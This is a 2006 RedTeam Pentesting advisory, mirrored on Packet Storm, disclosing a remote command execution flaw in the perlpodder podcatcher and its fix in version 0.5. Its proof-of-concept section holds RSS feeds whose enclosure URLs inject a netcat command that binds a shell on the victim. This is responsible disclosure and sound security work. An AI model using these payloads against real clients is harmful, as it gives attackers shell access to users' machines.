rt-sa-2006-003.txt

2006-05-24T00:00:00
ID PACKETSTORM:46609
Type packetstorm
Reporter RedTeam Pentesting
Modified 2006-05-24T00:00:00

Description

                                        
                                            `Advisory: Perlpodder Remote Arbitrary Command Execution  
  
RedTeam identified a security flaw in perlpodder which makes it possible  
for a malicious podcast server to execute arbitrary shell commands on  
the victim's client.  
  
  
Details  
=======  
  
Product: perlpodder  
Affected Versions: All versions up to perlpodder-0.4  
Fixed Versions: perlpodder-0.5  
Vulnerability Type: Remote arbitrary command execution  
Security-Risk: high  
Vendor-URL: http://perlpodder.sourceforge.net/  
Vendor-Status: informed, fixed  
Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2006-003.txt  
Advisory-Status: public  
CVE: GENERIC-MAP-NOMATCH  
CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH  
  
  
Introduction  
============  
  
Perlpodder is a podcatcher script written in perl. It automates  
downloading podcasts.  
  
(from perlpodder SourceForge page)  
  
Podcasting is the distribution of multimedia files over the internet.  
Normally, a server is providing an RSS or Atom XML feed describing where  
to get the multimedia files. The client parses the feed and may then  
download the desired files.  
  
  
More Details  
============  
  
When perlpodder is used to fetch a podcast, perlpodder will extract the  
URL of the audio-file from the XML-file the server provides. The URLs  
are saved in the variable "$dlset". There are two occasions in the code  
where this variable will be used together with the system() command:  
  
The first usage is with "echo" to log the URL (line 278):  
  
[...]  
277 # add urls to log file to mark as retrieved  
278 $addurl = "echo " . $dlset . " >> $log_path ";  
279 system $addurl;  
[...]  
  
The second usage is with "wget" to actually fetch the audio file (line  
294):  
  
[...]  
291 # Prepair to call wget  
292  
293 $wget_path = "$cwd". "$datadir" ;  
294 $wget_cmd = "wget --quiet --background -o /dev/null -c --tries=2   
--timeout=20 --random-wait " . $dlset . " -P ".   
$wget_path ;  
295  
296 if ($DEBUG > 0) {  
297  
298 print "running " . $wget_cmd . "\n" ;  
299  
300 }  
301  
302 system $wget_cmd;  
[...]  
  
Unfortunately, $dlset is never properly sanitized, so it is possible for  
the remote server to include arbitrary shell commands in the URL which  
will then be executed using system() (lines 279 and 302).  
  
  
Proof of Concept  
================  
  
A minimal malicious server rss feed which exploits the "echo" call may  
look as follows:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<?xml-stylesheet type="text/xsl"?>  
<rss version="2.0">  
<channel>  
<title>RedTeam Pentesting Example Malicious Server Feed</title>  
  
<item>  
<enclosure url="http://www.example.com/example.mp3 >> /dev/null; nc   
-e /bin/sh -l -p 1337 &#"  
length="241734" type="audio/mpeg" />  
</item>  
</channel>  
</rss>  
  
The URL above will open port 1337 via netcat on the victim's computer  
and bind a shell to it. This is just one example of how to exploit the  
vulnerability, as arbitrary commands can be included in the URL, but it  
should illustrate the point.  
  
To exploit the "wget" call, the URL just has to be minimally adjusted:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<?xml-stylesheet type="text/xsl"?>  
<rss version="2.0">  
<channel>  
<title>RedTeam Pentesting</title>  
  
<item>  
<enclosure url="http://www.example.com/example.mp3; nc -e /bin/sh -l   
-p 1337 &#"  
length="241734" type="audio/mpeg" />  
</item>  
</channel>  
</rss>  
  
  
Workaround  
==========  
  
Do not use perlpodder with untrusted servers.  
  
  
Fix  
===  
  
Upgrade to perlpodder-0.5 immediately[1].  
  
  
Security Risk  
=============  
  
High, because arbitrary shell commands can be executed on the victim's  
computer with the privileges of perlpodder (normally the user's  
privileges).  
  
  
History  
=======  
  
2006-05-19 Discovery of the problem  
2006-05-19 Notification of the author  
2006-05-21 Fixed version of perlpodder is released  
2006-05-22 Email from author pointing out the release  
2006-05-22 Public release of the advisory without CVE  
number because of public release by the  
author. CVE will be appended when available.  
  
  
  
References  
==========  
  
[1]   
http://prdownloads.sourceforge.net/perlpodder/perlpodder-0.5.tar.gz?download  
  
  
RedTeam  
=======  
  
RedTeam Pentesting is offering individual penetration tests, short  
pentests, performed by a team of specialised IT-security experts.  
Hereby, security weaknesses in company networks are uncovered and can be  
repaired immediately.  
  
As there are only few experts in this field, RedTeam wants to share its  
knowledge and enhance the public knowledge with research in security  
related areas. The results are made available as public security  
advisories.  
  
More information about RedTeam can be found at  
http://www.redteam-pentesting.de.  
  
--   
RedTeam Pentesting Tel.: +49-(0)241-963 1300  
Dennewartstr. 25-27 Fax : +49-(0)241-963 1304  
52068 Aachen http://www.redteam-pentesting.de  
`